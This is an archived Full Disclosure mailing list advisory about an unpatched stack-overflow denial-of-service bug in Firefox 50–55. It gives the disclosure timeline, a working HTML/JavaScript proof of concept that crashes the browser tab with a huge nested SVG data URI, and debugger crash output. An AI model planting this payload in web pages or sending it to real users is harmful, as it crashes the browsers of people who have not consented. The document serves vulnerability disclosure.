[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

[FD] Unpatched Mozilla Firefox v50 - v55 Stack Overflow DoS Vulnerability

To: "fulldisclosure@xxxxxxxxxxxx" <fulldisclosure@xxxxxxxxxxxx>
Subject: [FD] Unpatched Mozilla Firefox v50 - v55 Stack Overflow DoS Vulnerability
From: geeknik via Fulldisclosure <fulldisclosure@xxxxxxxxxxxx>
Date: Tue, 16 May 2017 17:13:21 -0400

Title:
==============
Unpatched Mozilla Firefox v50 - v55 Stack Overflow DoS Vulnerability

References:
==============
https://bugzilla.mozilla.org/show_bug.cgi?id=1322307

Timeline:
==============
Reported to Mozilla: 2016-12-06
Mozilla made public: 2016-12-15
Declined bounty: 2017-01-30
Advisory released: 2017-05-16

Technical Details:
==============
A stack overflow DoS vulnerability affecting Firefox versions 50 through 55 was 
discovered by Geeknik Labs. This flaw does NOT affect ESR 45 or the latest 
version of the Tor Browser Bundle. This flaw can be triggered by simply 
visiting a website with the PoC code embedded in it and requires no further 
user interaction nor does it require any special privileges. Successful 
exploitation results in the browser tab crashing.

Security Level:
==============
Medium

CVSS Score:
==============
3

Proof of Concept:
==============
<!--<html>
<head></head>
<body>
<script>
function done() {
}

var x = '';
for (i=0; i<500000; ++i)
x += '<a>';
var uri = 'data:image/svg+xml,' + x;
var i = new Image();
i.src = uri;
</script>
</body>
</html>-->

Visiting https://bugzilla.mozilla.org/attachment.cgi?id=8817075 may likely 
crash your browser tab.

Debug Information:
==============

(ff4.1108): Stack overflow - code c00000fd (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=5e3be520 ebx=00000000 ecx=256fab00 edx=00000001 esi=00000001 edi=256faab0
eip=5c718053 esp=00802ff4 ebp=00000000 iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010202
xul!mozilla::dom::Element::UnbindFromTree+0x3:
5c718053 53 push ebx

FAULTING_IP:
xul!nsINode::doRemoveChildAt+6a 
[c:\builds\moz2_slave\m-rel-w32-00000000000000000000\build\src\dom\base\nsinode.cpp
 @ 1910]
5c805677 8d4df8 lea ecx,[ebp-8]

BUCKET_ID: STACK_OVERFLOW_xul!nsINode::doRemoveChildAt+6a
PRIMARY_PROBLEM_CLASS: STACK_OVERFLOW_xul!nsINode::doRemoveChildAt+6a

Credits:
==============
Brian Carpenter, Geeknik Labs, https://twitter.com/geeknik

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

Prev by Date: [FD] Stealing Windows Credentials Using Google Chrome
Next by Date: Re: [FD] Cross-Site Request Forgery in WordPress Connection Information
Previous by thread: [FD] Stealing Windows Credentials Using Google Chrome
Next by thread: Re: [FD] Cross-Site Request Forgery in WordPress Connection Information
Index(es):
- Date
- Thread